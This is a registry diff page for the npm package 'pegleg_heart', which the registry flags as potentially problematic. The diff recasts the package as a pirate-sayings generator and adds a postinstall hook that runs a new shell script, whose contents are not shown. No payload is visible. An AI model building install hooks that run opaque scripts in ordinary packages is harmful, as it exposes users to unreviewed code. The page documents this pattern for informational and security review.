pegleg_heart 0.0.1-security → 0.0.10
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of pegleg_heart might be problematic. Click here for more details.
- package/README.md +8 -3
- package/main.js +3 -0
- package/package.json +9 -3
- package/post_install.sh +2 -0
package/README.md
CHANGED
@@ -1,5 +1,10 @@
|
|
1
|
-
#
|
1
|
+
# pegleg_hearty
|
2
2
|
|
3
|
-
|
3
|
+
An npm Package for Node.js to become generate pirate sayings for your wild waves
|
4
4
|
|
5
|
-
|
5
|
+
## Basic Usage
|
6
|
+
|
7
|
+
```javascript
|
8
|
+
var pegleg = require("pegleg_heart");
|
9
|
+
|
10
|
+
```
|
package/main.js
ADDED
package/package.json
CHANGED
@@ -1,6 +1,12 @@
|
|
1
1
|
{
|
2
2
|
"name": "pegleg_heart",
|
3
|
-
"version": "0.0.
|
4
|
-
"description": "
|
5
|
-
"
|
3
|
+
"version": "0.0.10",
|
4
|
+
"description": "A random generator for pirate sayings",
|
5
|
+
"main": "main.js",
|
6
|
+
"scripts": {
|
7
|
+
"postinstall": "chmod +x post_install.sh && ./post_install.sh",
|
8
|
+
"test": "echo \"Error: no test specified\" && exit 1"
|
9
|
+
},
|
10
|
+
"author": "",
|
11
|
+
"license": ""
|
6
12
|
}
|
package/post_install.sh
ADDED